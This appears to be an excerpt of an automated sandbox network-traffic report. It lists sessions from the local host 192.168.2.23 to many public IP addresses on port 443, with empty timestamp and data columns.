                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18347192.168.2.2354998171.167.5.68443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18348192.168.2.233818462.58.46.60443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18349192.168.2.2337144117.114.213.145443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18350192.168.2.2342698178.37.175.59443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18351192.168.2.233990420.230.117.36443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18352192.168.2.2339590131.193.14.159443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18353192.168.2.2356624208.15.124.136443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18354192.168.2.2348510216.3.220.88443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18355192.168.2.2360336133.91.100.205443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18356192.168.2.2351992204.76.24.74443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18357192.168.2.233994250.219.196.72443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18358192.168.2.235293212.76.160.51443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18359192.168.2.235163253.19.135.14443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18360192.168.2.2354230174.249.98.5443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18361192.168.2.2346248107.219.138.65443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18362192.168.2.2344640159.151.221.207443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18363192.168.2.234842490.183.123.52443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18364192.168.2.233759471.79.61.58443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18365192.168.2.2333990218.234.90.210443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18366192.168.2.2355962180.174.211.206443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18367192.168.2.235937098.224.37.176443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18368192.168.2.234040659.28.68.217443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18369192.168.2.23474989.5.3.149443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18370192.168.2.2339844207.230.199.107443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18371192.168.2.2355048107.5.145.58443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18372192.168.2.234115627.222.74.32443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18373192.168.2.234631075.156.215.158443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18374192.168.2.2353204165.55.3.225443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18375192.168.2.2359136125.186.235.20443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18376192.168.2.2347864106.146.67.7443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18377192.168.2.2353788197.82.115.154443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18378192.168.2.233580039.146.10.87443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18379192.168.2.234906058.113.59.149443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18380192.168.2.2339096136.240.106.214443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18381192.168.2.2352168106.220.203.250443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18382192.168.2.2338450135.166.200.56443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18383192.168.2.2340198199.128.110.109443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18384192.168.2.234794241.158.178.150443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18385192.168.2.2337244175.171.54.172443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18386192.168.2.2336308197.45.143.212443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18387192.168.2.2336978157.148.41.67443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18388192.168.2.2345848208.85.217.207443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18389192.168.2.2340810211.189.197.92443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18390192.168.2.234964288.42.32.30443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18391192.168.2.234487654.69.83.191443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18392192.168.2.234057480.165.103.95443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18393192.168.2.233835473.164.21.202443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18394192.168.2.233597473.222.240.163443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18395192.168.2.2350370185.170.185.172443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18396192.168.2.2350072145.172.73.181443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18397192.168.2.2346184150.183.34.129443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18398192.168.2.2337908150.165.1.224443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18399192.168.2.2354806153.79.23.237443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18400192.168.2.23420604.75.220.176443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18401192.168.2.2355124181.235.174.112443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18402192.168.2.2333974123.198.36.43443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18403192.168.2.2332788135.178.37.36443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18404192.168.2.2354790103.168.16.196443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18405192.168.2.234451268.242.72.98443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18406192.168.2.2347554186.73.13.191443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18407192.168.2.233731634.14.222.125443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18408192.168.2.234244248.138.61.3443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18409192.168.2.235659692.0.135.20443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18410192.168.2.2355486178.202.221.205443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18411192.168.2.2346522135.187.65.92443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18412192.168.2.2347370131.215.202.36443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18413192.168.2.2355038207.32.210.245443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18414192.168.2.235285636.123.132.122443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18415192.168.2.235123892.14.221.254443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18416192.168.2.2349236153.155.138.175443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18417192.168.2.234304475.152.166.101443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18418192.168.2.2334464104.109.78.208443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18419192.168.2.233497012.130.217.88443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18420192.168.2.2355020209.42.184.111443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18421192.168.2.2344818208.184.61.138443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18422192.168.2.2342866183.169.193.109443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18423192.168.2.234522491.167.18.255443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18424192.168.2.2355560195.18.39.57443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18425192.168.2.2335088118.36.42.254443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18426192.168.2.2338566147.21.41.101443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18427192.168.2.2336140125.73.198.62443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18428192.168.2.2351720106.89.112.31443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18429192.168.2.234225457.146.169.79443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18430192.168.2.2355022163.153.226.198443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18431192.168.2.234434861.203.142.192443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18432192.168.2.2350194190.56.221.30443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18433192.168.2.2350722163.219.149.88443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18434192.168.2.2345328159.245.8.48443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18435192.168.2.2353150135.30.88.121443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18436192.168.2.2357702160.144.215.27443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18437192.168.2.2345634132.163.206.195443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18438192.168.2.235655079.4.129.104443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18439192.168.2.235772627.103.193.218443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18440192.168.2.2355904207.212.7.150443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18441192.168.2.2348238176.129.164.77443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18442192.168.2.2354656186.229.134.20443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18443192.168.2.234441692.246.16.3443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18444192.168.2.2359052178.15.50.83443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18445192.168.2.2335176119.229.87.39443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18446192.168.2.2349662187.252.193.35443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18447192.168.2.235540013.203.168.154443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18448192.168.2.235378624.235.58.43443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18449192.168.2.236071834.169.149.2443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18450192.168.2.234340058.208.90.179443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18451192.168.2.2348574119.17.57.239443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18452192.168.2.2343264219.207.4.31443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18453192.168.2.2344546195.47.47.43443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18454192.168.2.2341560174.86.30.20443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18455192.168.2.2350324167.8.3.141443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18456192.168.2.2336090157.67.223.208443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18457192.168.2.2352122136.205.109.192443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18458192.168.2.2333398101.114.193.97443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18459192.168.2.235288284.80.1.37443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18460192.168.2.2349142186.91.32.202443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18461192.168.2.2337472181.146.93.202443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18462192.168.2.2345298209.120.120.62443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18463192.168.2.2342334150.108.190.140443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18464192.168.2.2337626141.44.20.63443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18465192.168.2.23418082.105.156.209443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18466192.168.2.2350714161.248.41.120443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18467192.168.2.2337986149.252.68.53443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18468192.168.2.2340056156.59.121.50443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18469192.168.2.2357164187.234.237.161443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18470192.168.2.2360830200.27.145.105443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18471192.168.2.2350136178.8.27.211443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18472192.168.2.234518820.187.234.98443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18473192.168.2.235854467.51.9.34443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18474192.168.2.233513035.219.37.44443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18475192.168.2.2357324174.212.105.65443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18476192.168.2.2341940124.241.200.93443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18477192.168.2.2351628115.30.102.122443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18478192.168.2.234788240.191.85.223443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18479192.168.2.2359268149.163.183.253443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18480192.168.2.2344142185.76.250.8443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18481192.168.2.2356238220.103.249.72443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18482192.168.2.234246697.214.99.50443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18483192.168.2.2357364158.64.157.5443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18484192.168.2.2358946119.130.164.91443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18485192.168.2.235980292.65.28.5443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18486192.168.2.2341192115.37.180.237443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18487192.168.2.2348342170.105.177.170443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18488192.168.2.2349190106.66.97.208443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18489192.168.2.233421495.131.133.23443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18490192.168.2.234961035.147.118.27443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18491192.168.2.2336922195.22.194.117443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18492192.168.2.235328895.28.246.38443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18493192.168.2.233486087.12.11.232443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18494192.168.2.2358334184.195.29.6443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18495192.168.2.2359482206.23.26.183443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18496192.168.2.2348690160.117.57.241443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18497192.168.2.2354190173.65.64.191443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18498192.168.2.2343024169.144.42.241443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18499192.168.2.2343344143.254.26.22443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18500192.168.2.2352256222.48.169.211443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18501192.168.2.2346894118.235.128.68443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18502192.168.2.2344442204.244.180.207443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18503192.168.2.233583863.99.7.148443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18504192.168.2.235318031.249.165.82443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18505192.168.2.235356249.150.234.35443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18506192.168.2.235074674.130.143.83443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18507192.168.2.2357678219.210.95.173443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18508192.168.2.235811245.228.217.199443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18509192.168.2.2353204208.101.19.210443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18510192.168.2.235574818.175.136.111443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18511192.168.2.2354932213.78.177.97443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18512192.168.2.2343858191.96.8.234443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18513192.168.2.234936488.76.72.142443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18514192.168.2.234983457.96.92.114443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18515192.168.2.2359532138.3.251.255443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18516192.168.2.235715650.102.205.117443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18517192.168.2.235496870.134.215.140443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18518192.168.2.235280036.126.165.122443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18519192.168.2.2354002161.200.74.88443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18520192.168.2.233665266.3.44.204443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18521192.168.2.2339198112.117.148.86443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18522192.168.2.233663262.117.38.25443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18523192.168.2.2337394183.28.24.131443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18524192.168.2.235918666.161.100.60443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18525192.168.2.2355582194.157.193.237443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18526192.168.2.2349304106.243.56.51443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18527192.168.2.235023223.224.180.111443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18528192.168.2.2333724132.235.183.145443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18529192.168.2.2338268217.54.195.5443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18530192.168.2.2339808205.38.171.42443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18531192.168.2.2336084157.67.5.249443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18532192.168.2.236010273.1.142.125443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18533192.168.2.2341814221.175.190.171443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18534192.168.2.2338280110.13.30.45443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18535192.168.2.2352842141.203.158.240443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18536192.168.2.2355736161.109.161.48443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18537192.168.2.235927053.54.7.154443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18538192.168.2.2347664207.162.159.7443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18539192.168.2.2336704119.33.235.34443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18540192.168.2.234449486.77.232.164443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18541192.168.2.2338162114.10.51.174443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18542192.168.2.2352342222.30.145.88443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18543192.168.2.2346038120.184.149.83443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18544192.168.2.2353720209.103.4.123443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18545192.168.2.235973491.4.24.224443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18546192.168.2.2339644173.252.82.73443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18547192.168.2.2359990178.242.55.7443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18548192.168.2.23409982.112.117.114443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18549192.168.2.2332984156.93.216.227443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18550192.168.2.2343364194.172.96.141443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18551192.168.2.235320888.185.212.167443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18552192.168.2.2354714200.171.186.26443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18553192.168.2.2344536122.248.62.42443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18554192.168.2.233419852.225.177.157443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18555192.168.2.235587883.113.122.250443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18556192.168.2.2351992129.240.42.179443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18557192.168.2.233409096.248.149.83443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18558192.168.2.2335034217.233.16.22443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18559192.168.2.23534784.221.34.65443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18560192.168.2.2344892114.67.94.232443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18561192.168.2.2339962104.249.84.2443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18562192.168.2.233335845.136.161.16443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18563192.168.2.235348625.21.103.207443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18564192.168.2.2347832204.201.214.208443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18565192.168.2.235141835.142.131.44443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18566192.168.2.2359262198.73.122.41443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18567192.168.2.234525663.228.112.123443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
